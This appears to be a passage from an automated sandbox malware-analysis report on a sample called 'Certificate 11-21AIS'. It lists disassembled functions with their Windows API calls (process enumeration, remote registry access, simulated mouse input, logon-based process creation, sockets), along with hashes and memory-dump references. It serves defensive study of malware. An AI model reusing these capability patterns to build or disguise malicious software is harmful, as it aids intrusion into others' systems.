                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$Client$Window$Screen
                                                                              • String ID:
                                                                              • API String ID: 1296646539-0
                                                                              • Opcode ID: 430c56b9ae32c155cd3c521dd0d9e8779f4b57c730d00bbba21deceec452fdb7
                                                                              • Instruction ID: 3b2484945c412b24c1b3357679a4a66fd8e1bf6379736affe006903e3f4793c6
                                                                              • Opcode Fuzzy Hash: 430c56b9ae32c155cd3c521dd0d9e8779f4b57c730d00bbba21deceec452fdb7
                                                                              • Instruction Fuzzy Hash: 10B1287990424ADBDF14CFA8C5807EEBBB5FF08314F14962AEC59EB250DB30A950DB64
                                                                              Function 00921BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00921C18
                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00921C26
                                                                              • __wsplitpath.LIBCMT ref: 00921C54
                                                                                • Part of subcall function 008E1DFC: __wsplitpath_helper.LIBCMT ref: 008E1E3C
                                                                              • _wcscat.LIBCMT ref: 00921C69
                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00921CDF
                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00921CF1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                              • String ID:
                                                                              • API String ID: 1380811348-0
                                                                              • Opcode ID: d09f65dcb6854850b3f605b75030b92e085ba22aebd2e4e43c78678dd1d78b4b
                                                                              • Instruction ID: f7b35c2a1f49e5ec47d3b8725f404a073e16a6b72a33fc07354a19b192ba36b6
                                                                              • Opcode Fuzzy Hash: d09f65dcb6854850b3f605b75030b92e085ba22aebd2e4e43c78678dd1d78b4b
                                                                              • Instruction Fuzzy Hash: 1B514B75108344ABD720EF64D885EABB7ECFF88754F00492EF589D6291EB70DA04CB92
                                                                              Function 00922FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00923C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00922BB5,?,?), ref: 00923C1D
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009230AF
                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009230EF
                                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00923112
                                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0092313B
                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0092317E
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0092318B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                              • String ID:
                                                                              • API String ID: 3451389628-0
                                                                              • Opcode ID: 00181815423b1c60011058c9d4cc406c8f9e14be20d8154eeec99df6b4f9132c
                                                                              • Instruction ID: 5e2b5ef081d97ce12561e0ba7df017ef30b988f8b708adf7fe0e9a4901480685
                                                                              • Opcode Fuzzy Hash: 00181815423b1c60011058c9d4cc406c8f9e14be20d8154eeec99df6b4f9132c
                                                                              • Instruction Fuzzy Hash: 09516B31208304AFC704EF68D895E6ABBF9FF89300F04891DF595872A2DB35EA15CB52
                                                                              Function 009284DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetMenu.USER32(?), ref: 00928540
                                                                              • GetMenuItemCount.USER32(00000000), ref: 00928577
                                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0092859F
                                                                              • GetMenuItemID.USER32(?,?), ref: 0092860E
                                                                              • GetSubMenu.USER32(?,?), ref: 0092861C
                                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 0092866D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Item$CountMessagePostString
                                                                              • String ID:
                                                                              • API String ID: 650687236-0
                                                                              • Opcode ID: 84f29e62a5ff43d7e28a82191465662f2edb532cdf51825525829fb434e6fb00
                                                                              • Instruction ID: 534d73821829eb366edf1cd8e0cd7cccdf4a9836e91c5619f184ad3937457ffb
                                                                              • Opcode Fuzzy Hash: 84f29e62a5ff43d7e28a82191465662f2edb532cdf51825525829fb434e6fb00
                                                                              • Instruction Fuzzy Hash: 44518B75A01229AFCB11EFA8D845AAEB7F4FF48310F104499F905FB391CB74AE418B91
                                                                              Function 00904AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00904B10
                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00904B5B
                                                                              • IsMenu.USER32(00000000), ref: 00904B7B
                                                                              • CreatePopupMenu.USER32 ref: 00904BAF
                                                                              • GetMenuItemCount.USER32(000000FF), ref: 00904C0D
                                                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00904C3E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                              • String ID:
                                                                              • API String ID: 3311875123-0
                                                                              • Opcode ID: 3092e734e6e4222451ed9129c664ea152d3c2af5736987272edb0f0d564edb89
                                                                              • Instruction ID: 650c8cffe2ecc9b965a084147c20bb8d539237f6f35180c1741cf6704bd7bedf
                                                                              • Opcode Fuzzy Hash: 3092e734e6e4222451ed9129c664ea152d3c2af5736987272edb0f0d564edb89
                                                                              • Instruction Fuzzy Hash: 2651E3B0602219EFEF20CF68C888BEDBBF8AF45318F144159E695DB2D1D7709944CB51
                                                                              Function 00918DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0095DC00), ref: 00918E7C
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00918E89
                                                                              • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00918EAD
                                                                              • #16.WSOCK32(?,?,00000000,00000000), ref: 00918EC5
                                                                              • _strlen.LIBCMT ref: 00918EF7
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00918F6A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$_strlenselect
                                                                              • String ID:
                                                                              • API String ID: 2217125717-0
                                                                              • Opcode ID: 368cad42a28f2acbe0f753e2dfc2f21632b825dd371795b1fd9b02ff67b48436
                                                                              • Instruction ID: dc2487d8d39a7c5a244bf13c113c824849f9948d19e66d7c46fdf647ea6b36d6
                                                                              • Opcode Fuzzy Hash: 368cad42a28f2acbe0f753e2dfc2f21632b825dd371795b1fd9b02ff67b48436
                                                                              • Instruction Fuzzy Hash: F7416F75600208ABCB14EBA8CD95EEEB7B9EF48314F104659F51AD7291DF30EE80DB51
                                                                              Function 008DABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008DB34E: GetWindowLongW.USER32(?,000000EB), ref: 008DB35F
                                                                              • BeginPaint.USER32(?,?,?), ref: 008DAC2A
                                                                              • GetWindowRect.USER32(?,?), ref: 008DAC8E
                                                                              • ScreenToClient.USER32(?,?), ref: 008DACAB
                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 008DACBC
                                                                              • EndPaint.USER32(?,?,?,?,?), ref: 008DAD06
                                                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0093E673
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                              • String ID:
                                                                              • API String ID: 2592858361-0
                                                                              • Opcode ID: f3d2faeaa4b3bd8b92e8ded070836ad24b768d53c221247b28abe386a7b180eb
                                                                              • Instruction ID: 827b978556a432618c38f69308e365255369b0739929f813bf5eabd935d26a63
                                                                              • Opcode Fuzzy Hash: f3d2faeaa4b3bd8b92e8ded070836ad24b768d53c221247b28abe386a7b180eb
                                                                              • Instruction Fuzzy Hash: FA419D741192049FC710DF24D884F7A7BACFB5A324F24066AF9A4C63A1D7319845EB62
                                                                              Function 0092E397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ShowWindow.USER32(00981628,00000000,00981628,00000000,00000000,00981628,?,0093DC5D,00000000,?,00000000,00000000,00000000,?,0093DAD1,00000004), ref: 0092E40B
                                                                              • EnableWindow.USER32(00000000,00000000), ref: 0092E42F
                                                                              • ShowWindow.USER32(00981628,00000000), ref: 0092E48F
                                                                              • ShowWindow.USER32(00000000,00000004), ref: 0092E4A1
                                                                              • EnableWindow.USER32(00000000,00000001), ref: 0092E4C5
                                                                              • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0092E4E8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Show$Enable$MessageSend
                                                                              • String ID:
                                                                              • API String ID: 642888154-0
                                                                              • Opcode ID: 7d7b7339dfec0046d2d0dd4013cf41d188fa05356b7ab5669276e3b8aceafadd
                                                                              • Instruction ID: 4e01c3e5cf311a350edb56f054d63df6a2a29a4c70902cd2f38dd8e42253b071
                                                                              • Opcode Fuzzy Hash: 7d7b7339dfec0046d2d0dd4013cf41d188fa05356b7ab5669276e3b8aceafadd
                                                                              • Instruction Fuzzy Hash: DE416034605150EFDB26DF24D4D9F947BE5BF0A304F1881A9EA588F2B6C731E845CB51
                                                                              Function 009098BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 009098D1
                                                                                • Part of subcall function 008DF4EA: std::exception::exception.LIBCMT ref: 008DF51E
                                                                                • Part of subcall function 008DF4EA: __CxxThrowException@8.LIBCMT ref: 008DF533
                                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00909908
                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00909924
                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0090999E
                                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 009099B3
                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 009099D2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                              • String ID:
                                                                              • API String ID: 2537439066-0
                                                                              • Opcode ID: 09ea360c70ccf5e9700cc3d5ab54eac9bdc1441ce3a1ca8d7358cce59bb424d0
                                                                              • Instruction ID: 747bb84a4f43db62d5a8b30d9c1a3527b7ec9e59403ab214031392850bd5bf73
                                                                              • Opcode Fuzzy Hash: 09ea360c70ccf5e9700cc3d5ab54eac9bdc1441ce3a1ca8d7358cce59bb424d0
                                                                              • Instruction Fuzzy Hash: CB31A175A00105AFDB00EF98DC85E6EB7B8FF85310B1481A9F905EB286D770DA10DBA1
                                                                              Function 00919B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,009177F4,?,?,00000000,00000001), ref: 00919B53
                                                                                • Part of subcall function 00916544: GetWindowRect.USER32(?,?), ref: 00916557
                                                                              • GetDesktopWindow.USER32 ref: 00919B7D
                                                                              • GetWindowRect.USER32(00000000), ref: 00919B84
                                                                              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00919BB6
                                                                                • Part of subcall function 00907A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00907AD0
                                                                              • GetCursorPos.USER32(?), ref: 00919BE2
                                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00919C44
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                              • String ID:
                                                                              • API String ID: 4137160315-0
                                                                              • Opcode ID: ee326eb856ae45ab6635c8c366b87dcb7194d1c38109e6ab51c6e7933e40e8d7
                                                                              • Instruction ID: ba603a83ecfc7ca961a9615243c1c4d6272fbc9415a969fad1b48e46156dbc75
                                                                              • Opcode Fuzzy Hash: ee326eb856ae45ab6635c8c366b87dcb7194d1c38109e6ab51c6e7933e40e8d7
                                                                              • Instruction Fuzzy Hash: E331EF76609309AFD710DF54D849F9AB7EDFF89314F00092AF599D7181DA30EA44CB92
                                                                              Function 008FAF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 008FAFAE
                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 008FAFB5
                                                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 008FAFC4
                                                                              • CloseHandle.KERNEL32(00000004), ref: 008FAFCF
                                                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 008FAFFE
                                                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 008FB012
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                              • String ID:
                                                                              • API String ID: 1413079979-0
                                                                              • Opcode ID: e31d1a79af13f73b34ae30113bbe52d5f85efc49ee33d44686ee59f20c683dde
                                                                              • Instruction ID: d8540cbedd6e04ad7ac6d2eacc5debdc20f10dc31d2741a4ea5c2fa6184e4cc5
                                                                              • Opcode Fuzzy Hash: e31d1a79af13f73b34ae30113bbe52d5f85efc49ee33d44686ee59f20c683dde
                                                                              • Instruction Fuzzy Hash: A8218BB610520DAFCF128FA8DD09FAE7BA9FF49318F044015FA05E6161C7768D20EB61
                                                                              Function 0092EBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008DAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 008DAFE3
                                                                                • Part of subcall function 008DAF83: SelectObject.GDI32(?,00000000), ref: 008DAFF2
                                                                                • Part of subcall function 008DAF83: BeginPath.GDI32(?), ref: 008DB009
                                                                                • Part of subcall function 008DAF83: SelectObject.GDI32(?,00000000), ref: 008DB033
                                                                              • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0092EC20
                                                                              • LineTo.GDI32(00000000,00000003,?), ref: 0092EC34
                                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0092EC42
                                                                              • LineTo.GDI32(00000000,00000000,?), ref: 0092EC52
                                                                              • EndPath.GDI32(00000000), ref: 0092EC62
                                                                              • StrokePath.GDI32(00000000), ref: 0092EC72
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                              • String ID:
                                                                              • API String ID: 43455801-0
                                                                              • Opcode ID: 99ec0fb75343b09b8c763c953785d3d9e5960883307056933afa89c5cf58b808
                                                                              • Instruction ID: d168a6f46e2f24d52735eb8a7c8476b61f76e5ae4d0ae80ab1d8208bdd530858
                                                                              • Opcode Fuzzy Hash: 99ec0fb75343b09b8c763c953785d3d9e5960883307056933afa89c5cf58b808
                                                                              • Instruction Fuzzy Hash: D211097A005159BFEB129F90DC88EEA7F6DEF09350F148112BE488A160D7719D55EBA0
                                                                              Function 008FE19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 008FE1C0
                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 008FE1D1
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008FE1D8
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 008FE1E0
                                                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 008FE1F7
                                                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 008FE209
                                                                                • Part of subcall function 008F9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,008F9A05,00000000,00000000,?,008F9DDB), ref: 008FA53A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CapsDevice$ExceptionRaiseRelease
                                                                              • String ID:
                                                                              • API String ID: 603618608-0
                                                                              • Opcode ID: 96a1f385a8fed1b583625d7597c31748649f76b4c52ef9cd832dc4b3d2efc4aa
                                                                              • Instruction ID: 81e8348433b5d6ea07a534b6280a16c10ebb91b4994008fc6e9b68e9a99e2425
                                                                              • Opcode Fuzzy Hash: 96a1f385a8fed1b583625d7597c31748649f76b4c52ef9cd832dc4b3d2efc4aa
                                                                              • Instruction Fuzzy Hash: A4018FB9A01618BFEB109BB68C45F5EBFB8EB49751F004066EE04E7290D6709C00CBA0
                                                                              Function 008E7B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __init_pointers.LIBCMT ref: 008E7B47
                                                                                • Part of subcall function 008E123A: __initp_misc_winsig.LIBCMT ref: 008E125E
                                                                                • Part of subcall function 008E123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 008E7F51
                                                                                • Part of subcall function 008E123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 008E7F65
                                                                                • Part of subcall function 008E123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 008E7F78
                                                                                • Part of subcall function 008E123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 008E7F8B
                                                                                • Part of subcall function 008E123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 008E7F9E
                                                                                • Part of subcall function 008E123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 008E7FB1
                                                                                • Part of subcall function 008E123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 008E7FC4
                                                                                • Part of subcall function 008E123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 008E7FD7
                                                                                • Part of subcall function 008E123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 008E7FEA
                                                                                • Part of subcall function 008E123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 008E7FFD
                                                                                • Part of subcall function 008E123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 008E8010
                                                                                • Part of subcall function 008E123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 008E8023
                                                                                • Part of subcall function 008E123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 008E8036
                                                                                • Part of subcall function 008E123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 008E8049
                                                                                • Part of subcall function 008E123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 008E805C
                                                                                • Part of subcall function 008E123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 008E806F
                                                                              • __mtinitlocks.LIBCMT ref: 008E7B4C
